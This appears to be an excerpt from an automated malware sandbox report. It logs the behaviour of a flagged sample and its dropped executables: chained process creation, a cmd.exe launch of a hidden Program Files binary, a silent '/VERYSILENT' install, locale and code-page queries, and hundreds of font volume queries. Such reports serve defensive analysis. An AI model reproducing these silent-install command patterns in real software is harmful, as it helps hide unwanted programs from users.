            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess created: C:\Windows\hh.exe 'C:\windows\hh.exe'
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /k 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8 & exit
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess created: C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe 'C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe' /VERYSILENT /p=testparams
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01021E6B cpuid 17_2_01021E6B
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_0103C0EB
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: EnumSystemLocalesW,17_2_0103C391
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: EnumSystemLocalesW,17_2_0103C3DC
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_0103C502
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: EnumSystemLocalesW,17_2_0103C477
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: EnumSystemLocalesW,17_2_010344C5
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: GetLocaleInfoW,17_2_0103C757
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: GetLocaleInfoW,17_2_0103C987
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0103C87F
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: GetLocaleInfoW,17_2_01034A21
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_0103CA5A
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,18_2_0040B044
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: GetLocaleInfoW,18_2_0041E034
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: GetLocaleInfoW,18_2_0041E080
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: GetLocaleInfoW,18_2_004AF208
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_0040A4CC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
